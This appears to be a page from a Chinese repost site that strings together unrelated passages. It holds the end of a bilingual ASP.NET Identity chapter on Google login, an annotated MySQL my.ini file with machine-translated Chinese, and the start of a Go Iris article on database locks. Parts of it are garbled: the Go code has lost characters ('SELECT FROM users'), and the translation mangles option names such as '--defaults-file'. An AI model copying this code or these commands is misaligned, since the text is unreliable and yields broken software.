Microsoft.Owin.Security.Twitter Authenticates users with Twitter accounts 用Twitter账号认证用户 Microsoft.Owin.Security.MicrosoftAccount Authenticates users with Microsoft accounts 用Microsoft账号认证用户 Microsoft.Owin.Security.OAuth Authenticates users against any OAuth 2.0 service 根据任一OAuth 2.0服务认证用户 Once the package is installed, I enable support for the authentication service in the OWIN startup class, which is defined in the App_Start/IdentityConfig.cs file in the example project. Listing 15-22 shows the change that I have made. 一旦安装了这个包,便可以在OWIN启动类中启用此项认证服务的支持,启动类的定义在示例项目的App_Start/IdentityConfig.cs文件中。清单15-22显示了所做的修改。 Listing 15-22. Enabling Google Authentication in the IdentityConfig.cs File 清单15-22. 在IdentityConfig.cs文件中启用Google认证 using Microsoft.AspNet.Identity;using Microsoft.Owin;using Microsoft.Owin.Security.Cookies;using Owin;using Users.Infrastructure;using Microsoft.Owin.Security.Google;namespace Users {public class IdentityConfig {public void Configuration(IAppBuilder app) {app.CreatePerOwinContext<AppIdentityDbContext>(AppIdentityDbContext.Create);app.CreatePerOwinContext<AppUserManager>(AppUserManager.Create);app.CreatePerOwinContext<AppRoleManager>(AppRoleManager.Create); app.UseCookieAuthentication(new CookieAuthenticationOptions {AuthenticationType = DefaultAuthenticationTypes.ApplicationCookie,LoginPath = new PathString("/Account/Login"),}); app.UseExternalSignInCookie(DefaultAuthenticationTypes.ExternalCookie);app.UseGoogleAuthentication();} }} Each of the packages that I listed in Table 15-9 contains an extension method that enables the corresponding service. The extension method for the Google service is called UseGoogleAuthentication, and it is called on the IAppBuilder implementation that is passed to the Configuration method. 表15-9所列的每个包都含有启用相应服务的扩展方法。用于Google服务的扩展方法名称为UseGoogleAuthentication,它通过传递给Configuration方法的IAppBuilder实现进行调用。 Next I added a button to the Views/Account/Login.cshtml file, which allows users to log in via Google. You can see the change in Listing 15-23. 下一步骤是在Views/Account/Login.cshtml文件中添加一个按钮,让用户能够通过Google进行登录。所做的修改如清单15-23所示。 Listing 15-23. Adding a Google Login Button to the Login.cshtml File 清单15-23. 在Login.cshtml文件中添加Google登录按钮 @model Users.Models.LoginModel@{ ViewBag.Title = "Login";}<h2>Log In</h2> @Html.ValidationSummary()@using (Html.BeginForm()) {@Html.AntiForgeryToken();<input type="hidden" name="returnUrl" value="@ViewBag.returnUrl" /><div class="form-group"><label>Name</label>@Html.TextBoxFor(x => x.Name, new { @class = "form-control" })</div><div class="form-group"><label>Password</label>@Html.PasswordFor(x => x.Password, new { @class = "form-control" })</div><button class="btn btn-primary" type="submit">Log In</button>}@using (Html.BeginForm("GoogleLogin", "Account")) {<input type="hidden" name="returnUrl" value="@ViewBag.returnUrl" /><button class="btn btn-primary" type="submit">Log In via Google</button>} The new button submits a form that targets the GoogleLogin action on the Account controller. You can see this method—and the other changes I made the controller—in Listing 15-24. 新按钮递交一个表单,目标是Account控制器中的GoogleLogin动作。可从清单15-24中看到该方法,以及在控制器中所做的其他修改。 Listing 15-24. Adding Support for Google Authentication to the AccountController.cs File 清单15-24. 在AccountController.cs文件中添加Google认证支持 using System.Threading.Tasks;using System.Web.Mvc;using Users.Models;using Microsoft.Owin.Security;using System.Security.Claims;using Microsoft.AspNet.Identity;using Microsoft.AspNet.Identity.Owin;using Users.Infrastructure;using System.Web; namespace Users.Controllers {[Authorize]public class AccountController : Controller {[AllowAnonymous]public ActionResult Login(string returnUrl) {if (HttpContext.User.Identity.IsAuthenticated) {return View("Error", new string[] { "Access Denied" });}ViewBag.returnUrl = returnUrl;return View();}[HttpPost][AllowAnonymous][ValidateAntiForgeryToken]public async Task<ActionResult> Login(LoginModel details, string returnUrl) {if (ModelState.IsValid) {AppUser user = await UserManager.FindAsync(details.Name,details.Password);if (user == null) {ModelState.AddModelError("", "Invalid name or password.");} else {ClaimsIdentity ident = await UserManager.CreateIdentityAsync(user,DefaultAuthenticationTypes.ApplicationCookie); ident.AddClaims(LocationClaimsProvider.GetClaims(ident));ident.AddClaims(ClaimsRoles.CreateRolesFromClaims(ident)); AuthManager.SignOut();AuthManager.SignIn(new AuthenticationProperties {IsPersistent = false}, ident);return Redirect(returnUrl);} }ViewBag.returnUrl = returnUrl;return View(details);} [HttpPost][AllowAnonymous]public ActionResult GoogleLogin(string returnUrl) {var properties = new AuthenticationProperties {RedirectUri = Url.Action("GoogleLoginCallback",new { returnUrl = returnUrl})};HttpContext.GetOwinContext().Authentication.Challenge(properties, "Google");return new HttpUnauthorizedResult();}[AllowAnonymous]public async Task<ActionResult> GoogleLoginCallback(string returnUrl) {ExternalLoginInfo loginInfo = await AuthManager.GetExternalLoginInfoAsync();AppUser user = await UserManager.FindAsync(loginInfo.Login);if (user == null) {user = new AppUser {Email = loginInfo.Email,UserName = loginInfo.DefaultUserName,City = Cities.LONDON, Country = Countries.UK};IdentityResult result = await UserManager.CreateAsync(user);if (!result.Succeeded) {return View("Error", result.Errors);} else {result = await UserManager.AddLoginAsync(user.Id, loginInfo.Login);if (!result.Succeeded) {return View("Error", result.Errors);} }}ClaimsIdentity ident = await UserManager.CreateIdentityAsync(user,DefaultAuthenticationTypes.ApplicationCookie);ident.AddClaims(loginInfo.ExternalIdentity.Claims);AuthManager.SignIn(new AuthenticationProperties {IsPersistent = false }, ident);return Redirect(returnUrl ?? "/");}[Authorize]public ActionResult Logout() {AuthManager.SignOut();return RedirectToAction("Index", "Home");}private IAuthenticationManager AuthManager {get {return HttpContext.GetOwinContext().Authentication;} }private AppUserManager UserManager {get {return HttpContext.GetOwinContext().GetUserManager<AppUserManager>();} }} } The GoogleLogin method creates an instance of the AuthenticationProperties class and sets the RedirectUri property to a URL that targets the GoogleLoginCallback action in the same controller. The next part is a magic phrase that causes ASP.NET Identity to respond to an unauthorized error by redirecting the user to the Google authentication page, rather than the one defined by the application: GoogleLogin方法创建了AuthenticationProperties类的一个实例,并为RedirectUri属性设置了一个URL,其目标为同一控制器中的GoogleLoginCallback动作。下一个部分是一个神奇阶段,通过将用户重定向到Google认证页面,而不是应用程序所定义的认证页面,让ASP.NET Identity对未授权的错误进行响应: ...HttpContext.GetOwinContext().Authentication.Challenge(properties, "Google");return new HttpUnauthorizedResult();... This means that when the user clicks the Log In via Google button, their browser is redirected to the Google authentication service and then redirected back to the GoogleLoginCallback action method once they are authenticated. 这意味着,当用户通过点击Google按钮进行登录时,浏览器被重定向到Google的认证服务,一旦在那里认证之后,便被重定向回GoogleLoginCallback动作方法。 I get details of the external login by calling the GetExternalLoginInfoAsync of the IAuthenticationManager implementation, like this: 我通过调用IAuthenticationManager实现的GetExternalLoginInfoAsync方法,我获得了外部登录的细节,如下所示: ...ExternalLoginInfo loginInfo = await AuthManager.GetExternalLoginInfoAsync();... The ExternalLoginInfo class defines the properties shown in Table 15-10. ExternalLoginInfo类定义的属性如表15-10所示: Table 15-10. The Properties Defined by the ExternalLoginInfo Class 表15-10. ExternalLoginInfo类所定义的属性 Name 名称 Description 描述 DefaultUserName Returns the username 返回用户名 Email Returns the e-mail address 返回E-mail地址 ExternalIdentity Returns a ClaimsIdentity that identities the user 返回标识该用户的ClaimsIdentity Login Returns a UserLoginInfo that describes the external login 返回描述外部登录的UserLoginInfo I use the FindAsync method defined by the user manager class to locate the user based on the value of the ExternalLoginInfo.Login property, which returns an AppUser object if the user has been authenticated with the application before: 我使用了由用户管理器类所定义的FindAsync方法,以便根据ExternalLoginInfo.Login属性的值对用户进行定位,如果用户之前在应用程序中已经认证,该属性会返回一个AppUser对象: ...AppUser user = await UserManager.FindAsync(loginInfo.Login);... If the FindAsync method doesn’t return an AppUser object, then I know that this is the first time that this user has logged into the application, so I create a new AppUser object, populate it with values, and save it to the database. I also save details of how the user logged in so that I can find them next time: 如果FindAsync方法返回的不是AppUser对象,那么我便知道这是用户首次登录应用程序,于是便创建了一个新的AppUser对象,填充该对象的值,并将其保存到数据库。我还保存了用户如何登录的细节,以便下次能够找到他们: ...result = await UserManager.AddLoginAsync(user.Id, loginInfo.Login);... All that remains is to generate an identity the user, copy the claims provided by Google, and create an authentication cookie so that the application knows the user has been authenticated: 剩下的事情只是生成该用户的标识了,拷贝Google提供的声明(Claims),并创建一个认证Cookie,以使应用程序知道此用户已认证: ...ClaimsIdentity ident = await UserManager.CreateIdentityAsync(user,DefaultAuthenticationTypes.ApplicationCookie);ident.AddClaims(loginInfo.ExternalIdentity.Claims);AuthManager.SignIn(new AuthenticationProperties { IsPersistent = false }, ident);... 15.4.2 Testing Google Authentication 15.4.2 测试Google认证 There is one further change that I need to make before I can test Google authentication: I need to change the account verification I set up in Chapter 13 because it prevents accounts from being created with e-mail addresses that are not within the example.com domain. Listing 15-25 shows how I removed the verification from the AppUserManager class. 在测试Google认证之前还需要一处修改:需要修改第13章所建立的账号验证,因为它不允许example.com域之外的E-mail地址创建账号。清单15-25显示了如何在AppUserManager类中删除这种验证。 Listing 15-25. Disabling Account Validation in the AppUserManager.cs File 清单15-25. 在AppUserManager.cs文件中取消账号验证 using Microsoft.AspNet.Identity;using Microsoft.AspNet.Identity.EntityFramework;using Microsoft.AspNet.Identity.Owin;using Microsoft.Owin;using Users.Models; namespace Users.Infrastructure {public class AppUserManager : UserManager<AppUser> {public AppUserManager(IUserStore<AppUser> store): base(store) {}public static AppUserManager Create(IdentityFactoryOptions<AppUserManager> options,IOwinContext context) {AppIdentityDbContext db = context.Get<AppIdentityDbContext>();AppUserManager manager = new AppUserManager(new UserStore<AppUser>(db)); manager.PasswordValidator = new CustomPasswordValidator {RequiredLength = 6,RequireNonLetterOrDigit = false,RequireDigit = false,RequireLowercase = true,RequireUppercase = true}; //manager.UserValidator = new CustomUserValidator(manager) {// AllowOnlyAlphanumericUserNames = true,// RequireUniqueEmail = true//};return manager;} }} Tip you can use validation for externally authenticated accounts, but I am just going to disable the feature for simplicity. 提示:也可以使用外部已认证账号的验证,但这里出于简化,取消了这一特性。 To test authentication, start the application, click the Log In via Google button, and provide the credentials for a valid Google account. When you have completed the authentication process, your browser will be redirected back to the application. If you navigate to the /Claims/Index URL, you will be able to see how claims from the Google system have been added to the user’s identity, as shown in Figure 15-7. 为了测试认证,启动应用程序,通过点击“Log In via Google(通过Google登录)”按钮,并提供有效的Google账号凭据。当你完成了认证过程时,浏览器将被重定向回应用程序。如果导航到/Claims/Index URL,便能够看到来自Google系统的声明(Claims),已被添加到用户的标识中了,如图15-7所示。 Figure 15-7. Claims from Google 图15-7. 来自Google的声明(Claims) 15.5 Summary 15.5 小结 In this chapter, I showed you some of the advanced features that ASP.NET Identity supports. I demonstrated the use of custom user properties and how to use database migrations to preserve data when you upgrade the schema to support them. I explained how claims work and how they can be used to create more flexible ways of authorizing users. I finished the chapter by showing you how to authenticate users via Google, which builds on the ideas behind the use of claims. 本章向你演示了ASP.NET Identity所支持的一些高级特性。演示了自定义用户属性的使用,还演示了在升级数据架构时,如何使用数据库迁移保护数据。我解释了声明(Claims)的工作机制,以及如何将它们用于创建更灵活的用户授权方式。最后演示了如何通过Google进行认证结束了本章,这是建立在使用声明(Claims)的思想基础之上的。 本篇文章为转载内容。原文链接:https://blog.csdn.net/gz19871113/article/details/108591802。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-10-28 08:49:21
283
转载
转载文章
...x you can copy this file to /etc/my.cnf to set global options, mysql-data-dir/my.cnf to set server-specific options (@localstatedir@ for this installation) or to ~/.my.cnf to set user-specific options. 在Linux上,您可以将该文件复制到/etc/my.cnf来设置全局选项,mysql-data-dir/my.cnf来设置特定于服务器的选项(此安装的@localstatedir@),或者~/.my.cnf来设置特定于用户的选项。 On Windows you should keep this file in the installation directory of your server (e.g. C:\Program Files\MySQL\MySQL Server X.Y). To make sure the server reads the config file use the startup option "--defaults-file". 在Windows上你应该保持这个文件在服务器的安装目录(例如C:\Program Files\MySQL\MySQL服务器X.Y)。要确保服务器读取配置文件,请使用启动选项“——default -file”。 To run the server from the command line, execute this in a command line shell, e.g. mysqld --defaults-file="C:\Program Files\MySQL\MySQL Server X.Y\my.ini" 要从命令行运行服务器,请在命令行shell中执行,例如mysqld——default -file="C:\Program Files\MySQL\MySQL server X.Y\my.ini" To install the server as a Windows service manually, execute this in a command line shell, e.g. mysqld --install MySQLXY --defaults-file="C:\Program Files\MySQL\MySQL Server X.Y\my.ini" 要手动将服务器安装为Windows服务,请在命令行shell中执行此操作,例如mysqld——install MySQLXY——default -file="C:\Program Files\MySQL\MySQL server X.Y\my.ini" And then execute this in a command line shell to start the server, e.g. net start MySQLXY 然后在命令行shell中执行这个命令来启动服务器,例如net start MySQLXY Guidelines for editing this file编辑此文件的指南 ---------------------------------------------------------------------- In this file, you can use all long options that the program supports. If you want to know the options a program supports, start the program with the "--help" option. 在这个文件中,您可以使用程序支持的所有长选项。如果您想知道程序支持的选项,请使用“——help”选项启动程序。 More detailed information about the individual options can also be found in the manual. For advice on how to change settings please see https://dev.mysql.com/doc/refman/8.0/en/server-configuration-defaults.html 有关各个选项的更详细信息也可以在手册中找到。有关如何更改设置的建议,请参见https://dev.mysql.com/doc/refman/8.0/en/server-configuration-defaults.html CLIENT SECTION 客户端部分 ---------------------------------------------------------------------- The following options will be read by MySQL client applications. Note that only client applications shipped by MySQL are guaranteed to read this section. If you want your own MySQL client program to honor these values, you need to specify it as an option during the MySQL client library initialization. MySQL客户机应用程序将读取以下选项。注意,只有MySQL提供的客户端应用程序才能阅读本节。如果您希望自己的MySQL客户机程序遵守这些值,您需要在初始化MySQL客户机库时将其指定为一个选项。 [client] pipe= socket=MYSQL port=3306 [mysql] no-beep default-character-set= SERVER SECTION 服务器部分 ---------------------------------------------------------------------- The following options will be read by the MySQL Server. Make sure that you have installed the server correctly (see above) so it reads this file. MySQL服务器将读取以下选项。确保您已经正确安装了服务器(参见上面),以便它读取这个文件。 server_type=3 [mysqld] The next three options are mutually exclusive to SERVER_PORT below. 下面的三个选项对SERVER_PORT是互斥的。skip-networking enable-named-pipe 共享内存 skip-networking enable-named-pipe shared-memory shared-memory-base-name=MYSQL The Pipe the MySQL Server will use socket=MYSQL The TCP/IP Port the MySQL Server will listen on port=3306 Path to installation directory. All paths are usually resolved relative to this. basedir="C:/Program Files/MySQL/MySQL Server 8.0/" Path to the database root datadir=C:/ProgramData/MySQL/MySQL Server 8.0/Data The default character set that will be used when a new schema or table is created and no character set is defined 创建新模式或表时使用的默认字符集,并且没有定义字符集 character-set-server= The default authentication plugin to be used when connecting to the server 连接到服务器时使用的默认身份验证插件 default_authentication_plugin=caching_sha2_password The default storage engine that will be used when create new tables when 当创建新表时将使用的默认存储引擎 default-storage-engine=INNODB Set the SQL mode to strict 将SQL模式设置为strict sql-mode="STRICT_TRANS_TABLES,NO_ENGINE_SUBSTITUTION" General and Slow logging. 一般和缓慢的日志。 log-output=NONE general-log=0 general_log_file="DESKTOP-NF9QETB.log" slow-query-log=0 slow_query_log_file="DESKTOP-NF9QETB-slow.log" long_query_time=10 Binary Logging. 二进制日志。 log-bin Error Logging. 错误日志记录。 log-error="DESKTOP-NF9QETB.err" Server Id. server-id=1 Indicates how table and database names are stored on disk and used in MySQL. 指示表名和数据库名如何存储在磁盘上并在MySQL中使用。 Value = 0: Table and database names are stored on disk using the lettercase specified in the CREATE TABLE or CREATE DATABASE statement. Name comparisons are case sensitive. You should not set this variable to 0 if you are running MySQL on a system that has case-insensitive file names (such as Windows or macOS). Value = 0:表名和数据库名使用CREATE Table或CREATE database语句中指定的lettercase存储在磁盘上。名称比较区分大小写。如果您在一个具有不区分大小写文件名(如Windows或macOS)的系统上运行MySQL,则不应将该变量设置为0。 Value = 1: Table names are stored in lowercase on disk and name comparisons are not case-sensitive. MySQL converts all table names to lowercase on storage and lookup. This behavior also applies to database names and table aliases. 表名以小写存储在磁盘上,并且名称比较不区分大小写。MySQL在存储和查找时将所有表名转换为小写。此行为也适用于数据库名称和表别名。 Value = 3, Table and database names are stored on disk using the lettercase specified in the CREATE TABLE or CREATE DATABASE statement, but MySQL converts them to lowercase on lookup. Name comparisons are not case sensitive. This works only on file systems that are not case-sensitive! InnoDB table names and view names are stored in lowercase, as for Value = 1.表名和数据库名使用CREATE Table或CREATE database语句中指定的lettercase存储在磁盘上,但是MySQL在查找时将它们转换为小写。名称比较不区分大小写。这只适用于不区分大小写的文件系统!InnoDB表名和视图名以小写存储,Value = 1。 NOTE: lower_case_table_names can only be configured when initializing the server. Changing the lower_case_table_names setting after the server is initialized is prohibited. lower_case_table_names=1 Secure File Priv. 权限安全文件 secure-file-priv="C:/ProgramData/MySQL/MySQL Server 8.0/Uploads" The maximum amount of concurrent sessions the MySQL server will allow. One of these connections will be reserved for a user with SUPER privileges to allow the administrator to login even if the connection limit has been reached. MySQL服务器允许的最大并发会话量。这些连接中的一个将保留给具有超级特权的用户,以便允许管理员登录,即使已经达到连接限制。 max_connections=151 The number of open tables for all threads. Increasing this value increases the number of file descriptors that mysqld requires. Therefore you have to make sure to set the amount of open files allowed to at least 4096 in the variable "open-files-limit" in 为所有线程打开的表的数量。增加这个值会增加mysqld需要的文件描述符的数量。因此,您必须确保在[mysqld_safe]节中的变量“open-files-limit”中将允许打开的文件数量至少设置为4096 section [mysqld_safe] table_open_cache=2000 Maximum size for internal (in-memory) temporary tables. If a table grows larger than this value, it is automatically converted to disk based table This limitation is for a single table. There can be many of them. 内部(内存)临时表的最大大小。如果一个表比这个值大,那么它将自动转换为基于磁盘的表。可以有很多。 tmp_table_size=94M How many threads we should keep in a cache for reuse. When a client disconnects, the client's threads are put in the cache if there aren't more than thread_cache_size threads from before. This greatly reduces the amount of thread creations needed if you have a lot of new connections. (Normally this doesn't give a notable performance improvement if you have a good thread implementation.) 我们应该在缓存中保留多少线程以供重用。当客户机断开连接时,如果之前的线程数不超过thread_cache_size,则将客户机的线程放入缓存。如果您有很多新连接,这将大大减少所需的线程创建量(通常,如果您有一个良好的线程实现,这不会带来显著的性能改进)。 thread_cache_size=10 MyISAM Specific options The maximum size of the temporary file MySQL is allowed to use while recreating the index (during REPAIR, ALTER TABLE or LOAD DATA INFILE. If the file-size would be bigger than this, the index will be created through the key cache (which is slower). MySQL允许在重新创建索引时(在修复、修改表或加载数据时)使用临时文件的最大大小。如果文件大小大于这个值,那么索引将通过键缓存创建(这比较慢)。 myisam_max_sort_file_size=100G If the temporary file used for fast index creation would be bigger than using the key cache by the amount specified here, then prefer the key cache method. This is mainly used to force long character keys in large tables to use the slower key cache method to create the index. myisam_sort_buffer_size=179M Size of the Key Buffer, used to cache index blocks for MyISAM tables. Do not set it larger than 30% of your available memory, as some memory is also required by the OS to cache rows. Even if you're not using MyISAM tables, you should still set it to 8-64M as it will also be used for internal temporary disk tables. 如果用于快速创建索引的临时文件比这里指定的使用键缓存的文件大,则首选键缓存方法。这主要用于强制大型表中的长字符键使用较慢的键缓存方法来创建索引。 key_buffer_size=8M Size of the buffer used for doing full table scans of MyISAM tables. Allocated per thread, if a full scan is needed. 用于对MyISAM表执行全表扫描的缓冲区的大小。如果需要完整的扫描,则为每个线程分配。 read_buffer_size=256K read_rnd_buffer_size=512K INNODB Specific options INNODB特定选项 innodb_data_home_dir= Use this option if you have a MySQL server with InnoDB support enabled but you do not plan to use it. This will save memory and disk space and speed up some things. 如果您启用了一个支持InnoDB的MySQL服务器,但是您不打算使用它,那么可以使用这个选项。这将节省内存和磁盘空间,并加快一些事情。skip-innodb skip-innodb If set to 1, InnoDB will flush (fsync) the transaction logs to the disk at each commit, which offers full ACID behavior. If you are willing to compromise this safety, and you are running small transactions, you may set this to 0 or 2 to reduce disk I/O to the logs. Value 0 means that the log is only written to the log file and the log file flushed to disk approximately once per second. Value 2 means the log is written to the log file at each commit, but the log file is only flushed to disk approximately once per second. 如果设置为1,InnoDB将在每次提交时将事务日志刷新(fsync)到磁盘,这将提供完整的ACID行为。如果您愿意牺牲这种安全性,并且正在运行小型事务,您可以将其设置为0或2,以将磁盘I/O减少到日志。值0表示日志仅写入日志文件,日志文件大约每秒刷新一次磁盘。值2表示日志在每次提交时写入日志文件,但是日志文件大约每秒只刷新一次磁盘。 innodb_flush_log_at_trx_commit=1 The size of the buffer InnoDB uses for buffering log data. As soon as it is full, InnoDB will have to flush it to disk. As it is flushed once per second anyway, it does not make sense to have it very large (even with long transactions).InnoDB用于缓冲日志数据的缓冲区大小。一旦它满了,InnoDB就必须将它刷新到磁盘。由于它无论如何每秒刷新一次,所以将它设置为非常大的值是没有意义的(即使是长事务)。 innodb_log_buffer_size=5M InnoDB, unlike MyISAM, uses a buffer pool to cache both indexes and row data. The bigger you set this the less disk I/O is needed to access data in tables. On a dedicated database server you may set this parameter up to 80% of the machine physical memory size. Do not set it too large, though, because competition of the physical memory may cause paging in the operating system. Note that on 32bit systems you might be limited to 2-3.5G of user level memory per process, so do not set it too high. 与MyISAM不同,InnoDB使用缓冲池来缓存索引和行数据。设置的值越大,访问表中的数据所需的磁盘I/O就越少。在专用数据库服务器上,可以将该参数设置为机器物理内存大小的80%。但是,不要将它设置得太大,因为物理内存的竞争可能会导致操作系统中的分页。注意,在32位系统上,每个进程的用户级内存可能被限制在2-3.5G,所以不要设置得太高。 innodb_buffer_pool_size=20M Size of each log file in a log group. You should set the combined size of log files to about 25%-100% of your buffer pool size to avoid unneeded buffer pool flush activity on log file overwrite. However, note that a larger logfile size will increase the time needed for the recovery process. 日志组中每个日志文件的大小。您应该将日志文件的合并大小设置为缓冲池大小的25%-100%,以避免在覆盖日志文件时出现不必要的缓冲池刷新活动。但是,请注意,较大的日志文件大小将增加恢复过程所需的时间。 innodb_log_file_size=48M Number of threads allowed inside the InnoDB kernel. The optimal value depends highly on the application, hardware as well as the OS scheduler properties. A too high value may lead to thread thrashing. InnoDB内核中允许的线程数。最优值在很大程度上取决于应用程序、硬件以及OS调度程序属性。过高的值可能导致线程抖动。 innodb_thread_concurrency=9 The increment size (in MB) for extending the size of an auto-extend InnoDB system tablespace file when it becomes full. 增量大小(以MB为单位),用于在表空间满时扩展自动扩展的InnoDB系统表空间文件的大小。 innodb_autoextend_increment=128 The number of regions that the InnoDB buffer pool is divided into. For systems with buffer pools in the multi-gigabyte range, dividing the buffer pool into separate instances can improve concurrency, by reducing contention as different threads read and write to cached pages. InnoDB缓冲池划分的区域数。对于具有多gb缓冲池的系统,将缓冲池划分为单独的实例可以提高并发性,因为不同的线程对缓存页面的读写会减少争用。 innodb_buffer_pool_instances=8 Determines the number of threads that can enter InnoDB concurrently. 确定可以同时进入InnoDB的线程数 innodb_concurrency_tickets=5000 Specifies how long in milliseconds (ms) a block inserted into the old sublist must stay there after its first access before it can be moved to the new sublist. 指定插入到旧子列表中的块必须在第一次访问之后停留多长时间(毫秒),然后才能移动到新子列表。 innodb_old_blocks_time=1000 It specifies the maximum number of .ibd files that MySQL can keep open at one time. The minimum value is 10. 它指定MySQL一次可以打开的.ibd文件的最大数量。最小值是10。 innodb_open_files=300 When this variable is enabled, InnoDB updates statistics during metadata statements. 当启用此变量时,InnoDB会在元数据语句期间更新统计信息。 innodb_stats_on_metadata=0 When innodb_file_per_table is enabled (the default in 5.6.6 and higher), InnoDB stores the data and indexes for each newly created table in a separate .ibd file, rather than in the system tablespace. 当启用innodb_file_per_table(5.6.6或更高版本的默认值)时,InnoDB将每个新创建的表的数据和索引存储在单独的.ibd文件中,而不是系统表空间中。 innodb_file_per_table=1 Use the following list of values: 0 for crc32, 1 for strict_crc32, 2 for innodb, 3 for strict_innodb, 4 for none, 5 for strict_none. 使用以下值列表:0表示crc32, 1表示strict_crc32, 2表示innodb, 3表示strict_innodb, 4表示none, 5表示strict_none。 innodb_checksum_algorithm=0 The number of outstanding connection requests MySQL can have. This option is useful when the main MySQL thread gets many connection requests in a very short time. It then takes some time (although very little) for the main thread to check the connection and start a new thread. The back_log value indicates how many requests can be stacked during this short time before MySQL momentarily stops answering new requests. You need to increase this only if you expect a large number of connections in a short period of time. MySQL可以有多少未完成连接请求。当MySQL主线程在很短的时间内收到许多连接请求时,这个选项非常有用。然后,主线程需要一些时间(尽管很少)来检查连接并启动一个新线程。back_log值表示在MySQL暂时停止响应新请求之前的短时间内可以堆多少个请求。只有当您预期在短时间内会有大量连接时,才需要增加这个值。 back_log=80 If this is set to a nonzero value, all tables are closed every flush_time seconds to free up resources and synchronize unflushed data to disk. This option is best used only on systems with minimal resources. 如果将该值设置为非零值,则每隔flush_time秒关闭所有表,以释放资源并将未刷新的数据同步到磁盘。这个选项最好只在资源最少的系统上使用。 flush_time=0 The minimum size of the buffer that is used for plain index scans, range index scans, and joins that do not use 用于普通索引扫描、范围索引扫描和不使用索引执行全表扫描的连接的缓冲区的最小大小。 indexes and thus perform full table scans. join_buffer_size=200M The maximum size of one packet or any generated or intermediate string, or any parameter sent by the mysql_stmt_send_long_data() C API function. 由mysql_stmt_send_long_data() C API函数发送的一个包或任何生成的或中间字符串或任何参数的最大大小 max_allowed_packet=500M If more than this many successive connection requests from a host are interrupted without a successful connection, the server blocks that host from performing further connections. 如果在没有成功连接的情况下中断了来自主机的多个连续连接请求,则服务器将阻止主机执行进一步的连接。 max_connect_errors=100 Changes the number of file descriptors available to mysqld. You should try increasing the value of this option if mysqld gives you the error "Too many open files". 更改mysqld可用的文件描述符的数量。如果mysqld给您的错误是“打开的文件太多”,您应该尝试增加这个选项的值。 open_files_limit=4161 If you see many sort_merge_passes per second in SHOW GLOBAL STATUS output, you can consider increasing the sort_buffer_size value to speed up ORDER BY or GROUP BY operations that cannot be improved with query optimization or improved indexing. 如果在SHOW GLOBAL STATUS输出中每秒看到许多sort_merge_passes,可以考虑增加sort_buffer_size值,以加快ORDER BY或GROUP BY操作的速度,这些操作无法通过查询优化或改进索引来改进。 sort_buffer_size=1M The number of table definitions (from .frm files) that can be stored in the definition cache. If you use a large number of tables, you can create a large table definition cache to speed up opening of tables. The table definition cache takes less space and does not use file descriptors, unlike the normal table cache. The minimum and default values are both 400. 可以存储在定义缓存中的表定义的数量(来自.frm文件)。如果使用大量表,可以创建一个大型表定义缓存来加速表的打开。与普通的表缓存不同,表定义缓存占用更少的空间,并且不使用文件描述符。最小值和默认值都是400。 table_definition_cache=1400 Specify the maximum size of a row-based binary log event, in bytes. Rows are grouped into events smaller than this size if possible. The value should be a multiple of 256. 指定基于行的二进制日志事件的最大大小,单位为字节。如果可能,将行分组为小于此大小的事件。这个值应该是256的倍数。 binlog_row_event_max_size=8K If the value of this variable is greater than 0, a replication slave synchronizes its master.info file to disk. (using fdatasync()) after every sync_master_info events. 如果该变量的值大于0,则复制奴隶将其主.info文件同步到磁盘。(在每个sync_master_info事件之后使用fdatasync())。 sync_master_info=10000 If the value of this variable is greater than 0, the MySQL server synchronizes its relay log to disk. (using fdatasync()) after every sync_relay_log writes to the relay log. 如果这个变量的值大于0,MySQL服务器将其中继日志同步到磁盘。(在每个sync_relay_log写入到中继日志之后使用fdatasync())。 sync_relay_log=10000 If the value of this variable is greater than 0, a replication slave synchronizes its relay-log.info file to disk. (using fdatasync()) after every sync_relay_log_info transactions. 如果该变量的值大于0,则复制奴隶将其中继日志.info文件同步到磁盘。(在每个sync_relay_log_info事务之后使用fdatasync())。 sync_relay_log_info=10000 Load mysql plugins at start."plugin_x ; plugin_y". 开始时加载mysql插件。“plugin_x;plugin_y” plugin_load The TCP/IP Port the MySQL Server X Protocol will listen on. MySQL服务器X协议将监听TCP/IP端口。 loose_mysqlx_port=33060 本篇文章为转载内容。原文链接:https://blog.csdn.net/mywpython/article/details/89499852。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-10-08 09:56:02
129
转载
Go Iris
...lation": "READ-COMMITTED", // 这里设置为读提交,你可以根据需求调整 } // 创建数据库连接池 db, err := sql.Open("mysql", config.FormatDSN()) if err != nil { panic(err) } // 使用数据库连接池 app.Use(func(ctx iris.Context) { ctx.Values().Set("db", db) ctx.Next() }) // 定义路由 app.Get("/", func(ctx iris.Context) { db := ctx.Values().Get("db").(sql.DB) // 开始事务 tx, err := db.Begin() if err != nil { ctx.StatusCode(iris.StatusInternalServerError) ctx.WriteString("Error starting transaction") return } defer tx.Rollback() // 执行查询 stmt, err := tx.Prepare("SELECT FROM users WHERE id = ? FOR UPDATE") if err != nil { ctx.StatusCode(iris.StatusInternalServerError) ctx.WriteString("Error preparing statement") return } defer stmt.Close() var user User err = stmt.QueryRow(1).Scan(&user.ID, &user.Name, &user.Email) if err != nil { ctx.StatusCode(iris.StatusInternalServerError) ctx.WriteString("Error executing query") return } // 更新数据 _, err = tx.Exec("UPDATE users SET name = ? WHERE id = ?", "New Name", user.ID) if err != nil { ctx.StatusCode(iris.StatusInternalServerError) ctx.WriteString("Error updating data") return } // 提交事务 err = tx.Commit() if err != nil { ctx.StatusCode(iris.StatusInternalServerError) ctx.WriteString("Error committing transaction") return } ctx.WriteString("Data updated successfully!") }) // 启动服务器 app.Run(iris.Addr(":8080")) } 5. 实际应用中的考虑 在实际应用中,我们需要根据具体的业务场景选择合适的锁类型。比如说,如果有好几个小伙伴得同时查看数据,又不想互相打扰,那我们就用共享锁来搞定。要是你想保证数据一致,防止同时有人乱改,那就得用排他锁了。 另外,要注意的是,过度使用锁可能会导致性能问题,因为锁会阻塞其他事务的执行。因此,在设计系统时,我们需要权衡数据一致性和性能之间的关系。 6. 结语 